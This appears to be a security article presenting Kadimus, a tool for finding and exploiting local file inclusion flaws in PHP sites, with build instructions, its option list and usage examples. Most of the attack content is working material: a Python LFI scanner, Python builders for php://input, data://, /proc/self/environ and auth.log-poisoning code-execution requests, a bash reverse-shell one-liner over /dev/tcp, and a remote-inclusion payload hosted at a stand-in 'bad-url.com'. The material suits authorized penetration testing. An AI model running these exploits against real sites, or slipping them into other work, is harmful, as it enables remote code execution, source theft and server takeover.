
Local file inclusion (LFI) vulnerability detection tool: Kadimus

2015-04-02 04:25
Kadimus is a security tool for detecting, and then exploiting, local file inclusion (LFI) vulnerabilities in web sites.

Features

Checks every URL parameter
/var/log/auth.log RCE
/proc/self/environ RCE
php://input RCE
data://text RCE
Source code disclosure
Multi-threaded scanner
Command shell interface over HTTP requests
Proxy support (socks4://, socks4a://, socks5://, socks5h:// and http://)

The RCE techniques each have a precondition: php://input and data:// only work when the target's PHP has allow_url_include enabled, while /proc/self/environ and /var/log/auth.log must be readable by the web server's user (auth.log usually is not on a default install).
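To make the "checks every URL parameter" step concrete, here is an added example written for this page; it is not code from Kadimus or the original article. It is a minimal LFI parameter scanner: each query parameter is replaced in turn with traversal and php://filter payloads, and the response is checked for a marker that only an included /etc/passwd would produce. The target URL, the `fetch` callable, the fake filesystem and the page names are constructed stand-ins so the scan runs offline; to use it for real, pass a `fetch` built on urllib or requests and point it at a host you are authorized to test.

```python
"""Minimal LFI parameter scanner (added example; not Kadimus code).

Each query parameter is swapped in turn for traversal / php://filter
payloads and the response is checked for a marker that only shows up if
/etc/passwd was really included.  The HTTP fetch is passed in as a
callable so the scan runs offline against the constructed target below.
"""
import base64
import posixpath
from urllib.parse import parse_qsl, urlencode, urlsplit, urlunsplit

# Probe payloads: plain traversal; traversal plus a trailing null byte, which
# truncates a suffix such as ".php" appended by the include() on PHP < 5.3.4;
# and the php://filter wrapper, which hands the file back base64-encoded
# instead of executing it (the same wrapper behind source disclosure).
TRAVERSAL = "../" * 8
PAYLOADS = [
    TRAVERSAL + "etc/passwd",
    TRAVERSAL + "etc/passwd%00",
    "php://filter/convert.base64-encode/resource=/etc/passwd",
]

# /etc/passwd starts with root's entry.  The marker is 9 bytes long so its
# base64 form (a whole number of 3-byte groups) is a prefix of the encoded file.
MARKER = "root:x:0:"
MARKER_B64 = base64.b64encode(MARKER.encode()).decode()   # "cm9vdDp4OjA6"


def mutate(url, param, payload):
    """Return url with the value of one query parameter replaced by payload."""
    parts = urlsplit(url)
    pairs = [(k, payload if k == param else v)
             for k, v in parse_qsl(parts.query, keep_blank_values=True)]
    # keep "/", ":" and "%" literal so "../" and "%00" reach the server as typed
    return urlunsplit(parts._replace(query=urlencode(pairs, safe="/:%")))


def looks_included(body):
    """True if the response contains the marker, plain or base64-encoded."""
    return MARKER in body or MARKER_B64 in body


def scan(url, fetch):
    """Probe every query parameter of url; return {param: [payloads that worked]}."""
    found = {}
    for param, _ in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = [p for p in PAYLOADS if looks_included(fetch(mutate(url, param, p)))]
        if hits:
            found[param] = hits
    return found


# --- constructed offline stand-in for a vulnerable page (not a real host) ---
# Emulates   <?php include($_GET['pg']); ?>   with $_GET['lang'] whitelisted,
# on a PHP build that still truncates paths at a null byte.
WEBROOT = "/var/www"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n"
                   "www-data:x:33:33::/var/www:/usr/sbin/nologin\n",
    WEBROOT + "/contact.php": "<?php echo 'contact page'; ?>",
}
FILTER = "php://filter/convert.base64-encode/resource="


def read_fake(path):
    path = path.split("\x00", 1)[0]                   # null-byte truncation
    return FAKE_FS.get(posixpath.normpath(posixpath.join(WEBROOT, path)))


def simulated_target(url):
    params = dict(parse_qsl(urlsplit(url).query, keep_blank_values=True))
    lang = params.get("lang") if params.get("lang") in ("en", "zh") else "en"
    page = params.get("pg", "contact.php")
    if page.startswith(FILTER):                       # wrapper: leak, don't run
        src = read_fake(page[len(FILTER):])
        body = base64.b64encode(src.encode()).decode() if src else ""
    else:
        body = read_fake(page) or "Warning: include(): failed to open stream"
    return f"<html lang='{lang}'><body>{body}</body></html>"


if __name__ == "__main__":
    # reports 'pg' with all three payloads; 'lang' is absent because it is whitelisted
    print(scan("http://localhost/?pg=contact.php&lang=en", simulated_target))
```

The base64 marker check matters: a php://filter response never contains the plain text, so a scanner that only greps for `root:x:0:` misses the wrapper-based case, which is exactly the case that later gives you source disclosure.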
Compiling

Install libcurl:

CentOS/Fedora
# yum install libcurl-devel

Debian based
# apt-get install libcurl4-openssl-dev

Install libpcre:

CentOS/Fedora
# yum install libpcre-devel

Debian based
# apt-get install libpcre3-dev

Install libssh:

CentOS/Fedora
# yum install libssh-devel

Debian based
# apt-get install libssh-dev

Finally run:

$ git clone https://github.com/P0cL4bs/Kadimus.git
$ cd Kadimus
$ make
Options

  -h, --help                     Display this help menu

Request:
  -B, --cookie STRING            Set custom HTTP Cookie header
  -A, --user-agent STRING        User-Agent to send to the server
  --connect-timeout SECONDS      Maximum time allowed for the connection
  --retry-times NUMBER           Number of times to retry if the connection fails
  --proxy STRING                 Proxy to connect through, syntax: protocol://hostname:port

Scanner:
  -u, --url STRING               Single URI to scan
  -U, --url-list FILE            File containing the URIs to scan
  -o, --output FILE              File to save output results to
  --threads NUMBER               Number of threads (2..1000)

Exploitation:
  -t, --target STRING            Vulnerable target to exploit
  --inject-at STRING             Parameter name to inject the exploit into
                                 (only needed with the data RCE technique and source disclosure)

RCE:
  -X, --rce-technique=TECH       LFI-to-RCE technique to use
  -C, --code STRING              Custom PHP code to execute, including the <?php ?> tags
  -c, --cmd STRING               Execute a system command on the vulnerable target
  -s, --shell                    Simple command shell interface through HTTP requests
  -r, --reverse-shell            Try to spawn a reverse shell connection
  -l, --listen NUMBER            Port to listen on
  -b, --bind-shell               Try to connect to a bind shell
  -i, --connect-to STRING        IP/hostname to connect to
  -p, --port NUMBER              Port number to connect to
  --ssh-port NUMBER              SSH port used to inject the payload (default: 22)
  --ssh-target STRING            SSH host used to inject the payload (auth technique only: the PHP
                                 code is sent as an SSH user name so that sshd writes it into
                                 /var/log/auth.log, which is then included)

RCE available techniques:
  environ   Try to run PHP code using /proc/self/environ
  input     Try to run PHP code using php://input
  auth      Try to run PHP code using /var/log/auth.log
  data      Try to run PHP code using data://text

Source Disclosure:
  -G, --get-source               Try to get the source files using the php://filter wrapper
  -f, --filename STRING          Set the filename to grab the source of [REQUIRED]
  -O FILE                        Set the output file (default: stdout)

Usage examples

Scanning:

./kadimus -u localhost/?pg=contact -A my_user_agent
./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

Fetching a file's source (through the php://filter wrapper, injected into the pg parameter):

./kadimus -t localhost/?pg=contact -G -f "index.php" -O local_output.php --inject-at pg

Executing PHP code (the code travels in the request body and is included via php://input):

./kadimus -t localhost/?pg=php://input -C '<?php echo "pwned"; ?>' -X input

Command execution (the payload is first written into /var/log/auth.log by a failed SSH login against --ssh-target, then the log is included):

./kadimus -t localhost/?pg=/var/log/auth.log -X auth -c 'ls -lah' --ssh-target localhost

Checking for remote file inclusion (RFI): host a file such as shell.txt on a server you control with the content below. The base64 decodes to the marker text "scorpion say get over here"; if that text shows up in the target's response, the remote file was fetched, included and executed.

/* http://bad-url.com/shell.txt */ <?php echo base64_decode("c2NvcnBpb24gc2F5IGdldCBvdmVyIGhlcmU="); ?>

Reverse shell (-r -l 12345 listens on local port 12345 for the connection that the injected bash command opens back; the data:// technique delivers the command):

./kadimus -t localhost/?pg=contact.php -Xdata --inject-at pg -r -l 12345 -c 'bash -i >& /dev/tcp/127.0.0.1/12345 0>&1' --retry-times 0
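The examples above name the techniques but not what each one actually puts on the wire. The following added example, written for this page and not taken from Kadimus or the article, builds the request for each technique (php://filter source disclosure and the input, data, environ and auth RCE paths) as a (method, url, headers, body) tuple, and shows the marker trick that lets a tool cut a command's output out of the surrounding HTML. The target URL `http://localhost/`, the `pg` parameter and the marker string are assumptions taken from the examples; the marker bracketing and the ssh user-name delivery are the standard forms of these techniques, not a description of Kadimus's internals. Nothing is sent; hand the tuples to any HTTP client against a host you are authorized to test.

```python
"""LFI-to-RCE and source-disclosure request builders (added example; not
Kadimus code).  Each builder returns (method, url, headers, body): the request
that delivers a PHP payload to a vulnerable include().  Nothing is sent; the
output can be inspected or handed to any HTTP client.
"""
import base64
import json
from urllib.parse import quote

TARGET = "http://localhost/"     # hypothetical target, as in the article's examples
PARAM = "pg"                     # hypothetical vulnerable parameter
MARKER = "KADIMUS_OUT"           # arbitrary delimiter; must not contain quotes


def with_param(value):
    """URL with the payload as the vulnerable parameter.  Everything except
    "/" and ":" is percent-encoded, so "+", ";" and "=" inside a data:// or
    php://filter payload survive the server's query parsing."""
    return f"{TARGET}?{PARAM}={quote(value, safe='/:')}"


def php_cmd(cmd, marker=MARKER):
    """Wrap a shell command in PHP and bracket its output with a marker so it
    can be cut out of the surrounding HTML (see extract_output)."""
    return f'<?php echo "{marker}"; system({json.dumps(cmd)}); echo "{marker}"; ?>'


def extract_output(body, marker=MARKER):
    """Text between the two marker copies, or None if the payload never ran."""
    start = body.find(marker)
    if start < 0:
        return None
    start += len(marker)
    end = body.find(marker, start)
    return body[start:end] if end >= 0 else None


def source_disclosure(filename):
    """php://filter hands the file back base64-encoded, so the PHP is never run."""
    url = with_param(f"php://filter/convert.base64-encode/resource={filename}")
    return ("GET", url, {}, b"")


def decode_source(body):
    """Recover the source text from a php://filter response body."""
    return base64.b64decode(body.strip()).decode()


def rce_input(php_code):
    """php://input: the raw POST body is what gets included (allow_url_include=On).
    Do not use multipart/form-data, for which php://input is not available."""
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    return ("POST", with_param("php://input"), headers, php_code.encode())


def rce_data(php_code):
    """data:// wrapper: the PHP rides inside the URL itself (allow_url_include=On)."""
    b64 = base64.b64encode(php_code.encode()).decode()
    return ("GET", with_param(f"data://text/plain;base64,{b64}"), {}, b"")


def rce_environ(php_code, depth=6):
    """/proc/self/environ: the PHP rides in the User-Agent header, which the
    web server exports as HTTP_USER_AGENT into its own environment.  The file
    must be readable by the server's user and depth must reach the root."""
    url = with_param("../" * depth + "proc/self/environ")
    return ("GET", url, {"User-Agent": php_code}, b"")


def rce_auth_log(php_code, ssh_host="localhost", ssh_port=22, depth=6):
    """/var/log/auth.log: sshd records a failed login's user name verbatim
    ("Invalid user <name> from ..."), so the PHP is first planted out of band
    as an SSH user name, then the log is included.  Returns the ssh argument
    vector to run (the login is meant to fail) plus the request.  Only works
    where the log is readable by the web server user."""
    ssh_argv = ["ssh", "-p", str(ssh_port), f"{php_code}@{ssh_host}"]
    url = with_param("../" * depth + "var/log/auth.log")
    return ssh_argv, ("GET", url, {}, b"")


if __name__ == "__main__":
    for name, req in [("filter", source_disclosure("index.php")),
                      ("input", rce_input(php_cmd("id"))),
                      ("data", rce_data(php_cmd("id"))),
                      ("environ", rce_environ(php_cmd("id")))]:
        print(name, req[0], req[1], req[2])
    print("auth (run first):", rce_auth_log(php_cmd("id"))[0])
```

The percent-encoding in `with_param` is not cosmetic: a data:// payload whose base64 contains `+` would be decoded by the server as a space if sent raw, and the `=` padding would be split off as a new query parameter, so the include would fail for reasons that look nothing like a patched target.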
Source: www.2cto.com/Article/201504/386920.html